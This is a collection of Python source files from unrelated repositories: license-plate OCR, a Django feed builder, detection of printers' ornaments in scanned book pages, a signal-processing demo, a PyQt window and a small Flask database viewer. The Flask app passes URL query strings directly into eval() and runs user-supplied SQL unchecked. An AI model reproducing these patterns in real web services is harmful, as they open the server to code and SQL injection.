reading = charReader.findMatch(otsu_char, threshold, perform_unit_test=debug)
if reading == '?':
retained_list.append(blob)
else:
removed_list.append(blob)
num_removed = (len(input_blobs[0]) - len(retained_list))
if num_removed > 0:
print colored("Blacklisted: %i" %num_removed,
on_color='on_green', attrs=['bold'])
if len(retained_list):
return [retained_list], [removed_list]
else:
return [retained_list], []
```
#### File: spear/LPR/charRecog.py
```python
import SimpleCV
import cv2
import os
import time
import matplotlib.pyplot
class CharReader:
def __init__(self, inp_image_path):
char_template_list = []
img_filename_list = os.listdir(inp_image_path)
#Load all images and make CharTemplate objects
for img_filename in img_filename_list:
char_image = SimpleCV.Image(inp_image_path + img_filename)
char_value = img_filename.split(".")[0].split("_")[0]
this_char_template = CharTemplate(char_image, char_value)
char_template_list.append(this_char_template)
#Sort by value
char_template_list.sort(key = lambda (this_template): this_template.value)
#Store all CharTemplate objects
self.templates = char_template_list
def findMatch(self, inp_test_image, threshold=0, perform_unit_test=False):
#Contains list of (char, percent) tuples.
result_list = []
for this_template in self.templates:
template_image = this_template.image
current_char = this_template.value
perc_match = compareImage(inp_test_image, template_image)
result_list.append((current_char, perc_match))
#----------------------------------------------------------------
if perform_unit_test:
display = SimpleCV.Display((640, 480), title="SPEAR")
print "Char:" + current_char + " [" + str(perc_match) + " %]"
while not display.isDone():
w, h = inp_test_image.width, inp_test_image.height
inp_test_image.sideBySide(template_image.resize(w, h).invert()).save(display)
if display.mouseLeft:
display.done = True
time.sleep(0.2)
display.done = False
#---------------------------------------------------------------
#Sort result_list by highest percentage
result_list = sorted(result_list,
key=lambda(this_tuple): this_tuple[1],
reverse=True)
#---------------------------------------------------------
if perform_unit_test:
match_plot = matplotlib.pyplot
char_list, perc_list = [], []
for pair in result_list:
char_list.append(pair[0])
perc_list.append(pair[1])
match_plot.xticks(range(0, len(char_list)), char_list)
match_plot.stem(perc_list)
match_plot.show()
#---------------------------------------------------------
#If highest match is 0% then put a '?' Char instead
if result_list[0][1] > float(threshold):
best_match = result_list[0][0]
else:
best_match = '?'
return best_match
class CharTemplate:
def __init__(self, template_img, template_value):
self.image = template_img
self.value = template_value
def compareImage(test_image, template_image, compMeth=cv2.TM_SQDIFF_NORMED):
"""
Method:
Compares an image against a template and returns matching percentage.
Parameters:
test_image - A SimpleCV.Image to be used.
template_image - A SimpleCV.Image for the template.
compMeth = CV2 comparison method.
Returns:
Similarity percentage of two images.
"""
#Resize template to fit test image
template_image_cv2 = template_image.invert().resize(test_image.width, test_image.height).getGrayNumpyCv2()
test_image_cv2 = test_image.getGrayNumpyCv2()
match_result = cv2.matchTemplate(test_image_cv2, template_image_cv2, compMeth)
match_percent = 100 - (100 * match_result[0][0])
return match_percent
```
#### File: spear/LPR/maskCreate.py
```python
import sklearn.cluster
def colorSegmentation(input_image, NUM_CLUSTERS=7, RANGE_OFFSET=30, SCALE_FACTOR=0.1,
use_fast_KMeans=False, perform_unit_test=False,
right_click_save=False):
"""
Method:
Takes a SimpleCV.Image, computes the most dominant colors
using K-Means clustering, and returns a list of SimpleCV.Image
binary masks using the dominant color.
Parameters:
input_image - Input image to be used.
NUM_CLUSTERS - Number of Clusters (k) for K-Means algortihm.
RANGE_OFFSET - Minimum and maximum deviation from the RGB center.
SCALE_FACTOR - Applies scaling to reduce processing delay at cost of accuracy loss.
use_fast_KMeans - Use Mini Batch KMeans for faster processing at cost of accuracy loss.
perform_unit_test - Used for debugging.
right_click_save - Right click saves image in Unit Test mode.
Returns:
List of SimpleCV.Image with applied binary mask.
"""
#For some reason, scale method doesn't yield expected result with Kmeans :/
scaled_image = input_image.resize(int(input_image.width * SCALE_FACTOR),
int(input_image.height * SCALE_FACTOR))
raw_RGB_list = _toPixelArray(scaled_image)
clustered_RGB_list = _getDominantColors(raw_RGB_list, NUM_CLUSTERS, use_fast_KMeans)
color_mask_list = _makeBinaryMasks(input_image, clustered_RGB_list, RANGE_OFFSET)
if perform_unit_test:
_unitTest(input_image, raw_RGB_list, clustered_RGB_list,
color_mask_list, right_click_save)
return color_mask_list
def thresholdSweep(input_image, MIN_THRESHOLD=0, MAX_THRESHOLD=255,
THRESH_STEP=10, use_rgb_mask=False):
"""
Method:
Creates list of SimpleCV.Image masks using Threshold Sweeping.
Parameters:
input_image - Image to use in generating masks.
MIN_THRESHOLD - Lower boundary of the sweep.
MAX_THRESHOLD - Upper boundary of the sweep.
THRESH_STEP - Incremental value from lower to upper boundary.
use_rgb_mask - Use RGB channels of an image rather than just the grayscale.
Returns:
List of SimpleCV.Image, the Masks generated.
"""
#Returns a Generator!
make_mask = lambda (this_img): _createMaskThresholdSweep(this_img, MIN_THRESHOLD, MAX_THRESHOLD, THRESH_STEP)
if not use_rgb_mask:
return make_mask(input_image)
else:
combined_masks = []
r, g, b = input_image.splitChannels()
#This ruins the generator (i think) by turning it to a list?
combined_masks.extend(make_mask(r))
combined_masks.extend(make_mask(g))
combined_masks.extend(make_mask(b))
return combined_masks
def _unitTest(input_image, raw_RGB_list, clustered_RGB_list, color_mask_list, save_on_right_click):
import SimpleCV
import time
display = SimpleCV.Display((input_image.width, input_image.height))
print "Extracted " + str(len(clustered_RGB_list)) + " colors."
for index, this_mask in enumerate(color_mask_list):
print clustered_RGB_list[index]
this_mask.save(display)
while not display.isDone():
if display.mouseLeft:
display.done = True
time.sleep(0.2)
elif display.mouseRight and save_on_right_click:
this_mask.save(str(index) + ".jpg")
print "Image saved."
time.sleep(0.2)
display.done = False
def _toPixelArray(input_image):
RGB_pixel_matrix = input_image.getNumpy()
RGB_pixel_array = RGB_pixel_matrix.reshape(
(RGB_pixel_matrix.shape[0] * RGB_pixel_matrix.shape[1],
3))
return RGB_pixel_array
def _getDominantColors(RGB_array, NUM_CLUSTERS, use_mini_batch):
if use_mini_batch:
cluster_method = sklearn.cluster.MiniBatchKMeans(NUM_CLUSTERS)
else:
cluster_method = sklearn.cluster.KMeans(n_clusters = NUM_CLUSTERS)
cluster_method.fit(RGB_array)
RGB_list = cluster_method.cluster_centers_[:]
return RGB_list
def _makeBinaryMasks(input_image, RGB_color_list, RGB_OFFSET):
mask_list = []
for this_RGB in RGB_color_list:
RGB_min = map(lambda val: _addSub(val, -RGB_OFFSET), this_RGB)
RGB_max = map(lambda val: _addSub(val, RGB_OFFSET), this_RGB)
this_mask = input_image.createBinaryMask(RGB_min, RGB_max)
mask_list.append(this_mask)
return mask_list
def _addSub(inp_val, oper_val):
inp_val += oper_val
if inp_val < 0:
inp_val = 0
elif inp_val > 255:
inp_val = 255
return inp_val
def _createMaskThresholdSweep(inp_image, LOW_BOUND, UPPER_BOUND, INCREMENT):
for thresh in xrange(LOW_BOUND, UPPER_BOUND + 1, INCREMENT):
yield inp_image.threshold(thresh).invert().dilate().erode()
```
|
{
"source": "j-e-d/django-bakery",
"score": 2
}
|
#### File: django-bakery/bakery/feeds.py
```python
import os
import six
import logging
from django.conf import settings
from bakery.views import BuildableMixin
from django.contrib.syndication.views import Feed
logger = logging.getLogger(__name__)
class BuildableFeed(Feed, BuildableMixin):
"""
Extends the base Django Feed class to be buildable.
"""
build_path = 'feed.xml'
def get_content(self, *args, **kwargs):
return self(self.request, *args, **kwargs).content
@property
def build_method(self):
return self.build_queryset
def _get_bakery_dynamic_attr(self, attname, obj, args=None, default=None):
"""
Allows subclasses to provide an attribute (say, 'foo') in three
different ways: As a fixed class-level property or as a method
foo(self) or foo(self, obj). The second argument argument 'obj' is
the "subject" of the current Feed invocation. See the Django Feed
documentation for details.
This method was shamelessly stolen from the Feed class and extended
with the ability to pass additional arguments to subclass methods.
"""
try:
attr = getattr(self, attname)
except AttributeError:
return default
if callable(attr) or args:
args = args[:] if args else []
# Check co_argcount rather than try/excepting the function and
# catching the TypeError, because something inside the function
# may raise the TypeError. This technique is more accurate.
try:
code = six.get_function_code(attr)
except AttributeError:
code = six.get_function_code(attr.__call__)
if code.co_argcount == 2 + len(args): # one argument is 'self'
args.append(obj)
return attr(*args)
return attr
def get_queryset(self):
return [None]
def build_queryset(self):
for obj in self.get_queryset():
build_path = self._get_bakery_dynamic_attr('build_path', obj)
url = self._get_bakery_dynamic_attr('feed_url', obj)
logger.debug("Building %s" % build_path)
self.request = self._get_bakery_dynamic_attr(
'create_request',
obj,
args=[url or build_path]
)
self.prep_directory(build_path)
path = os.path.join(settings.BUILD_DIR, build_path)
content = self._get_bakery_dynamic_attr('get_content', obj)
self.build_file(path, content)
```
|
{
"source": "jeddobson/mmlec",
"score": 3
}
|
#### File: mmlec/bin/find_ornamentation_figures.py
```python
import cv2
import imutils
import os, sys, shutil, glob
import numpy as np
import pickle
import nltk
from nltk.corpus import words
from bs4 import BeautifulSoup
import argparse
# set default options
ocrboundaries = False
single_image = False
# parse arguments
parser = argparse.ArgumentParser(
description='locates objects and annotates ECCO TIF documents')
parser.add_argument('object')
parser.add_argument('--draw-ocr-boundaries',help='place green boxes around paragraphs', dest='ocrboundaries', action='store_true')
parser.add_argument('--single-image', help='mark-up just a single page image', dest='single_image', action='store')
args = parser.parse_args()
object = args.object
if args.ocrboundaries == True:
ocrboundaries = True
if args.single_image != False:
single_image_switch = True
single_image = args.single_image
if object == None:
print("Error: need ECCO object")
exit()
# load English language vocabulary
vocab = words.words()
################################################################################
# pre-load and process all images used for pattern matching
# convert to grayscale on load
################################################################################
manicule_gray = cv2.imread('share/manicule1.jpg',0)
arabesque_gray = cv2.imread('share/arabesque.jpg',0)
rosette_gray = cv2.imread('share/rosette.png',0)
annotation3_gray = cv2.imread('share/annotation3.jpg',0)
longdash_gray = cv2.imread('share/longdash.jpg',0)
# asterisms
asterism_gray = cv2.imread('share/asterism.jpg',0)
inverted_asterism_gray = cv2.imread('share/inverted_asterism.jpg',0)
asterism_block_gray = cv2.imread('share/asterism_block.jpg',0)
astrism_line_gray = cv2.imread('share/asterism_line.jpg',0)
#asterisk_image = cv2.imread('share/asterisk1.jpg')
#asterisk_gray = cv2.cvtColor(asterisk_image, cv2.COLOR_BGR2GRAY)
def find_inverted_asterism(target,output):
(tH, tW) = inverted_asterism_gray.shape[:2]
res = cv2.matchTemplate(target,inverted_asterism_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterism(target,output):
(tH, tW) = asterism_gray.shape[:2]
res = cv2.matchTemplate(target,asterism_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterism_line(target,output):
(tH, tW) = asterism_line_gray.shape[:2]
res = cv2.matchTemplate(target,asterism_line_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterism_block(target,output):
(tH, tW) = asterism_block_gray.shape[:2]
res = cv2.matchTemplate(target,asterism_block_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_longdash(target,output):
(tH, tW) = longdash_gray.shape[:2]
res = cv2.matchTemplate(target,longdash_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.75
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_manicule(target,output):
(tH, tW) = manicule_gray.shape[:2]
res = cv2.matchTemplate(target,manicule_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.75
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_arabesque(target,output):
(tH, tW) = arabesque_gray.shape[:2]
res = cv2.matchTemplate(target,arabesque_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_rosette(target,output):
(tH, tW) = rosette_gray.shape[:2]
res = cv2.matchTemplate(target,rosette_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.65
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterisk(target,output):
(tH, tW) = asterisk_gray.shape[:2]
res = cv2.matchTemplate(target,asterisk_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.70
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def page_reader(volume):
file_name = volume
data = open(file_name,encoding='ISO-8859-1').read()
soup = BeautifulSoup(data, "html.parser")
page_data = soup.findAll('page')
###############################################
# calculate page size
# present method is to find maximum x and y
###############################################
page_size_max = soup.findAll('wd')
max_length = max([int(word.get('pos').split(',')[:2][1]) for word in page_size_max])
max_width = max([int(word.get('pos').split(',')[:2][0]) for word in page_size_max])
page_size = max_length * max_width
# start parsing each page
volume_text = list()
line_starting_position = list()
volume_dataset=list()
volume_dims=list()
for page in page_data:
page_line_starting_position=list()
page_number = page.find('pageid').get_text()
# get page dimensions
word_matrix=list()
t = page.findAll('wd')
for x in t:
word_matrix.append(x.get('pos'))
paragraph_data = page.findAll('p')
paragraph_count = len(paragraph_data)
page_text=list()
page_dims=list()
for paragraph in paragraph_data:
paragraph_matrix=list()
words = paragraph.findAll('wd')
pmin_x1 = min([int(w.get('pos').split(',')[:2][0]) for w in words])
pmin_y1 = min([int(w.get('pos').split(',')[:2][1]) for w in words])
pmax_x2 = max([int(w.get('pos').split(',')[2:][0]) for w in words])
pmax_y2 = max([int(w.get('pos').split(',')[2:][1]) for w in words])
# add x,y of first and last word
#wordloc1 = words[0].get('pos').split(',')[:2]
#wordloc2 = words[(len(words) - 1)].get('pos').split(',')[:2]
#page_dims.append([wordloc1,wordloc2])
page_dims.append([pmin_x1,pmin_y1,pmax_x2,pmax_y2])
structured_list=list()
temp_line=str()
for word in words:
lines=list()
content = word.get_text()
position = word.get('pos').split(',')
paragraph_matrix.append(position)
temp_line=temp_line + ' ' + content.strip()
if int(position[0]) < int(paragraph_matrix[len(paragraph_matrix) - 2][0]):
page_line_starting_position.append(int(position[0]))
lines.append(temp_line)
temp_line=str()
if(len(lines)) > 0:
structured_list.append(lines)
page_text.append(structured_list)
line_starting_position.append(page_line_starting_position)
volume_dims.append(page_dims)
volume_text.append(page_text)
c=list()
for y in page_text:
if len(y) > 0:
for t in y:
c.append(len(str(t[0]).split()))
white_space=0
text_space=0
prior_y = 0
prior_x = 0
for paragraph in page_dims:
text_space = text_space + ( (int(paragraph[2]) - int(paragraph[0])) * (int(paragraph[3]) - int(paragraph[1])))
return(volume_dims,volume_text)
base="../LitAndLang_1/"
volume_dims,volume_text = page_reader(base + object + "/xml/" + object + ".xml")
processed_dir = base + object + "/processed"
image_dir = base + object + "/images/"
# check to see if the directory exists and remove
if os.path.isdir(processed_dir):
shutil.rmtree(processed_dir,ignore_errors=True)
os.mkdir(processed_dir)
found_objects=list()
idx=0
for image_tif in glob.glob(image_dir + '*.TIF'):
# feature to run just on a single image (needs basename)
if single_image_switch == True:
if os.path.basename(image_tif) == single_image:
pass
else:
continue
page_dims = volume_dims[idx]
# need to preserve color information
page_image = cv2.imread(image_tif)
gray_image = cv2.cvtColor(page_image, cv2.COLOR_BGR2GRAY)
gray_image = cv2.GaussianBlur(gray_image, (3, 3), 0)
edges = cv2.Canny(gray_image,50,100)
#asterisk_c = find_asterisk(gray_image,page_image)
asterism_c = find_asterism(gray_image,page_image)
inverted_asterism_c = find_inverted_asterism(gray_image,page_image)
manicule_c = find_manicule(gray_image,page_image)
arabesque_c = find_arabesque(gray_image,page_image)
rosette_c = find_rosette(gray_image,page_image)
#longdash_c = find_longdash(gray_image,page_image)
longdash_c = 0
x, y = page_image.shape[:2]
page_area = x * y
mask = np.ones(page_image.shape[:2], dtype="uint8") * 255
pidx=0
for paragraph in page_dims:
word_c = 0
sentences = volume_text[idx][pidx]
if len(sentences) > 0:
for s in sentences:
tokens = nltk.word_tokenize(str(s))
tokens_in_vocab = [word for word in tokens if word.lower() in vocab]
word_c = word_c + len(tokens_in_vocab)
# dump suspect OCR: only mask if we find more than two known words
if word_c > 2:
cv2.rectangle(mask, (paragraph[0], paragraph[1]), (paragraph[2], paragraph[3]), 0, -1)
# draw boundaries around paragraphs if requested
if ocrboundaries == True:
cv2.rectangle(page_image, (paragraph[0], paragraph[1]), (paragraph[2], paragraph[3]), (0,255,0), 2)
pidx = pidx + 1
# smooth page image and mask
edges = cv2.bitwise_and(edges, edges, mask=mask)
kernel = np.ones((5,5),np.uint8)
dilation = cv2.dilate(edges,kernel,iterations = 1)
#output_file = processed_dir + "/d" + os.path.basename(image_tif)
#cv2.imwrite(output_file,dilation)
# search for countours within dilated image
pg_img, contours, hierarchy = cv2.findContours(dilation, cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE)
image_c = 0
for cnt in contours:
x,y,w,h = cv2.boundingRect(cnt)
# if area of our object is more than 20k pixels
# also remove narrow (bars) or long objects (artifacts)
image_max = 20000
if w * h > image_max and w > (h / 8) and h > (w / 8):
print("found object:",x,y,w,h)
#if w * h > ( page_area * .05) and w > (h / 8):
cv2.rectangle(page_image,(x,y),(x+w,y+h),(255,0,0), 2)
image_c = image_c +1
output_file = processed_dir + "/" + os.path.basename(image_tif)
cv2.imwrite(output_file,page_image)
# store list of found objects
found_objects.append([image_tif,image_c,asterism_c,inverted_asterism_c,manicule_c,
arabesque_c,rosette_c,longdash_c])
idx = idx + 1
output_pickle=open(processed_dir + '/objects_' + object + '.pkl','wb')
pickle.dump(found_objects,output_pickle)
```
|
{
"source": "jedediahfrey/PyLTIGUI",
"score": 3
}
|
#### File: PyLTIGUI/ltigui/systems_intro_v2.py
```python
from __future__ import division
from scipy import *
from pylab import *
from scipy import signal
T=2.0
#T=10.0
fs=100
dt=1.0/fs
t=arange(0.0,T,dt)#create the time vector
u=where(t>0.5,1,0)#create the step input vector
ylim([-0.1,1.1])
#mysys=signal.lti(1,[1,0])
p=4.0*2*pi
mysys=signal.lti(p,[1,p])#this line defines a transfer function
yo=signal.lsim2(mysys,u,t)#this line simulates the output of the system based on input u and time t
u=squeeze(u)
figure(1)
cla()
plot(t,u,t,yo[1])
legend(['input','output'],2)
xlabel('Time (sec)')
ylabel('Amplitude')
title('Step Response')
df=1.0/T#(t.max()-t.min())
f=arange(0,fs,df)
s=2.0j*pi*f
#tf=1.0/s
N=len(f)
def bodeplot(fi,f,tf,clear=True):
figure(fi)
if clear:
clf()
subplot(211)
semilogx(f,20*log10(abs(tf)))
ylabel('Mag. Ratio (dB)')
subplot(212)
semilogx(f,arctan2(imag(tf),real(tf))*180.0/pi)
ylabel('Phase (deg.)')
xlabel('Freq. (Hz)')
#################################
#
# Swept Sine
#
#################################
def Usweep(ti,minf=0.0,maxf=10.0, maxt=max(t)):
if ti<0.0:
return 0.0
else:
curf=(maxf-minf)*ti/maxt+minf
if ti<(maxt*0.95):
return sin(2*pi*curf*ti)
else:
return 0.0
Uchirp=array([Usweep(ti) for ti in t])#this line defins a swept sine input
yc=signal.lsim2(mysys,Uchirp,t)#this line calculates the response to the swept sine input
Uchirp=squeeze(Uchirp)
yco=yc[1]
figure(3)
clf()
subplot(211)
plot(t,Uchirp)
ylabel('input u(t)')
title('Swept Sine Response')
subplot(212)
plot(t,yco)
ylabel('output y(t)')
xlabel('Time (sec)')
ycfft=fft(yco)*2/N
ucfft=fft(Uchirp)*2/N
tfc=ycfft/ucfft
tfcheck=p/(s+p)
bodeplot(4,f,tfc)
bodeplot(4,f,tfcheck,clear=False)
fN=f[int(N/2)]
subplot(211)
xlim([0.1,fN])
legend(['experiment','model'],3)
title('Bode Plot')
subplot(212)
xlim([0.1,fN])
ylim([-100,10])
show()
```
|
{
"source": "jedediahfrey/PyQt5Scratch",
"score": 2
}
|
#### File: PyQt5Scratch/mpldesigner/window.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(658, 498)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.mplwindow = QtWidgets.QWidget(self.centralwidget)
self.mplwindow.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mplwindow.sizePolicy().hasHeightForWidth())
self.mplwindow.setSizePolicy(sizePolicy)
self.mplwindow.setMinimumSize(QtCore.QSize(640, 480))
self.mplwindow.setObjectName("mplwindow")
self.mplvl = QtWidgets.QVBoxLayout(self.mplwindow)
self.mplvl.setObjectName("mplvl")
self.mplfigs = QtWidgets.QListWidget(self.mplwindow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mplfigs.sizePolicy().hasHeightForWidth())
self.mplfigs.setSizePolicy(sizePolicy)
self.mplfigs.setMaximumSize(QtCore.QSize(200, 16777215))
self.mplfigs.setObjectName("mplfigs")
self.mplvl.addWidget(self.mplfigs)
self.gridLayout.addWidget(self.mplwindow, 0, 0, 2, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
```
|
{
"source": "jedelacarrera/FlaskDB",
"score": 3
}
|
#### File: FlaskDB/flaskr/__init__.py
```python
import os
import sys
import psycopg2
import json
from bson import json_util
from pymongo import MongoClient
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash
def create_app():
app = Flask(__name__)
return app
app = create_app()
# REPLACE WITH YOUR DATABASE NAME
MONGODATABASE = "myDatabase"
MONGOSERVER = "localhost"
MONGOPORT = 27017
client = MongoClient(MONGOSERVER, MONGOPORT)
mongodb = client[MONGODATABASE]
# Uncomment for postgres connection
# REPLACE WITH YOUR DATABASE NAME, USER AND PASS
"""
POSTGRESDATABASE = "myDatabase"
POSTGRESUSER = "user"
POSTGRESPASS = "password"
postgresdb = psycopg2.connect(
database=POSTGRESDATABASE,
user=POSTGRESUSER,
password=<PASSWORD>)
"""
QUERIES_FILENAME = '/var/www/flaskr/queries'
# Path para local
# QUERIES_FILENAME = 'queries'
@app.route("/")
def home():
try:
with open(QUERIES_FILENAME, 'r', encoding='utf-8') as queries_file:
json_file = json.load(queries_file)
pairs = [(x["name"],
x["database"],
x["description"],
x["query"],
x["params"]) for x in json_file]
return render_template('file.html', results=pairs)
except(FileNotFoundError):
with open('queries', 'r', encoding='utf-8') as queries_file:
json_file = json.load(queries_file)
pairs = [(x["name"],
x["database"],
x["description"],
x["query"],
x["params"]) for x in json_file]
return render_template('file.html', results=pairs)
@app.route("/mongo")
def mongo():
try:
lista = request.args.get("query").split('---')
query = lista[0]
if len(lista) > 1:
args = lista[1:]
while query.find('param') != -1:
pos = query.find('param')
num = query[pos + 5]
if '-' in args[int(num) - 1]:
args[int(num) - 1] = '"' + args[int(num) - 1] + '"'
query = query.replace('param'+num, args[int(num) - 1])
if 'messages.find({$and: [{$or: [{"sender":' in query:
results = mongodb.messages.find({"$and": [{"$or": [{"sender": args[0]}, {"sender": args[1]}]}, {"$or": [{"receptant": args[0]}, {"receptant": args[1]}]}]}, {"_id": 0, "date": 1, "sender": 1, "message":1, "receptant": 1})
else:
results = eval('mongodb.'+query)
results = json_util.dumps(results, sort_keys=True, indent=4)
if "find" in query:
return render_template('mongo.html', results=results)
else:
return "ok"
except:
return render_template('mongo.html', results={'query': query, 'problema': 'falta la base de datos de mongo'})
@app.route("/postgres")
def postgres():
try:
query = request.args.get("query")
cursor = postgresdb.cursor()
cursor.execute(query)
results = [[a for a in result] for result in cursor]
print(results)
return render_template('postgres.html', results=results)
except:return render_template('postgres.html', results=[['status', 'Error'],['Ricci hola', ' wayo hola'], ['query', query]])
@app.route("/example")
def example():
return render_template('example.html')
@app.route("/map")
def map():
try:
lista = request.args.get("query").split('---')
query = lista[0]
if len(lista) > 1:
args = lista[1:]
while query.find('param') != -1:
pos = query.find('param')
num = query[pos + 5]
if '-' in args[int(num) - 1]:
args[int(num) - 1] = '"' + args[int(num) - 1] + '"'
query = query.replace('param'+num, args[int(num) - 1])
results = eval('mongodb.'+query)
results = json_util.dumps(results, sort_keys=True, indent=4)
if "find" in query:
return render_template('leaflet.html', results=results)
else:
return "ok"
except:
return render_template('mongo.html', results={'query': query, 'problema': 'falta la base de datos de mongo'})
if __name__ == "__main__":
app.run()
```
|
{
"source": "jedeland/jedel_name_generator",
"score": 3
}
|
#### File: stroke/line/__init__.py
```python
from . import abstract
__all__ = ('sub', 'trail', 'prefix', 'parse', 'analyse', 'context', 'State')
def sub(store, *names):
"""
Decorator for adding states to stores.
Returns a new store for nesting.
"""
def wrapper(invoke):
value = type(store)()
state = (invoke, value)
for name in names:
store[name] = state
return value
return wrapper
def trail(store, *names):
"""
Get the value of a state from names.
Will raise KeyError with the name not belonging to store.
"""
return abstract.trail(store, names)
def prefix(values, content):
"""
Discover start and separate from content.
Will raise ValueError if none of the starts match.
"""
for value in values:
if content.startswith(value):
break
else:
raise ValueError('invalid starts')
content = content[len(value):]
return (value, content)
lower = '.'
middle = ' '
upper = ' '
def parse(content, lower = lower, middle = middle):
"""
Split content into names and argument.
"""
return abstract.parse(content, lower, middle)
def analyse(store, content, parse = parse):
"""
Parse content and find the respective invoke.
"""
(names, argument) = parse(content)
invoke = trail(store, *names) if names else None
return (names, argument, invoke)
def context(store, starts, content, prefix = prefix, analyse = analyse):
"""
Split content between start and rest, parse rest to find names and
argument, use names to find an invoke. Can raise all respective errors.
"""
(start, content) = prefix(starts, content)
(names, argument, invoke) = analyse(store, content)
return (start, names, argument, invoke)
class State(dict):
"""
Neat little way of collecting this module's functionality.
"""
__slots__ = ()
sub = sub
trail = trail
analyse = analyse
context = context
```
#### File: stroke/parse/general.py
```python
import itertools
from . import abstract
__all__ = ('strip', 'clean', 'flag', 'group', 'split')
escape = '\\'
def strip(value, escape = escape, apply = str.strip, ghost = 1):
"""
Strip value and clean escapes from ends.
"""
value = apply(value)
revert = len(escape)
for index in range(ghost):
if value.startswith(escape):
value = value[revert:]
if value.endswith(escape):
value = value[:-revert]
return value
def clean(values, strip = strip, empty = True):
"""
Strip each value and yield if not empty.
"""
for value in values:
value = strip(value)
if not value and empty:
continue
yield value
def flag(values, *limits, escape = escape, low = -1):
"""
Differenciate values according to some keywords.
"""
kills = 0
revert = len(escape)
current = None
limits = {key: limit or low for (key, limit) in limits}
for (valid, key, span) in abstract.flag(escape, values, limits):
(start, stop) = (spot - kills for spot in span)
if not valid:
back = start - revert
values = values[:back] + values[start:]
kills += revert
continue
yield (current, values[:start])
current = key
values = values[stop:]
kills += stop
yield (current, values)
def group(values, *limits, flag = flag):
"""
Group key-value pairs by the key.
"""
(initial, *extras) = flag(values, *limits)
(junk, initial) = initial
try:
(keys, limits) = zip(*limits)
except ValueError:
values = ()
else:
store = {key: [] for key in keys}
for (key, value) in extras:
store[key].append(value)
(keys, values) = zip(*store.items())
return (initial, *values)
def split(values, key, limit, group = group):
"""
Separate flags by the key.
"""
limit = (key, limit)
(value, values) = group(values, limit)
values.insert(0, value)
return values
```
#### File: apps/translipsum/__init__.py
```python
from six import PY3
from transliterate.utils import translit
if PY3:
from transliterate.contrib.apps.translipsum.utils import Generator
else:
from lipsum import Generator
__title__ = 'transliterate.contrib.apps.translipsum.__init__'
__author__ = '<NAME>'
__copyright__ = '2013-2018 <NAME>'
__license__ = 'GPL 2.0/LGPL 2.1'
__all__ = ('TranslipsumGenerator',)
class TranslipsumGenerator(Generator):
"""Lorem ipsum generator."""
def __init__(self, language_code, reversed=False, *args, **kwargs):
self._language_code = language_code
self._reversed = reversed
super(TranslipsumGenerator, self).__init__(*args, **kwargs)
def generate_sentence(self, *args, **kwargs):
"""Generate sentence."""
value = super(TranslipsumGenerator, self).generate_sentence(
*args, **kwargs
)
return translit(value,
language_code=self._language_code,
reversed=self._reversed)
def generate_paragraph(self, *args, **kwargs):
"""Generate paragraph."""
value = super(TranslipsumGenerator, self).generate_paragraph(
*args, **kwargs
)
return translit(value,
language_code=self._language_code,
reversed=self._reversed)
```
|
{
"source": "jedelman8/pycsco",
"score": 2
}
|
#### File: pycsco/nxos/device.py
```python
try:
import xmltodict
import os.path
import yaml
import json
from os.path import expanduser
from nxapi import NXAPI
from error import CLIError
except ImportError as e:
print '***************************'
print e
print '***************************'
class Auth():
def __init__(self, vendor, model):
home = expanduser('~')
self.username = None
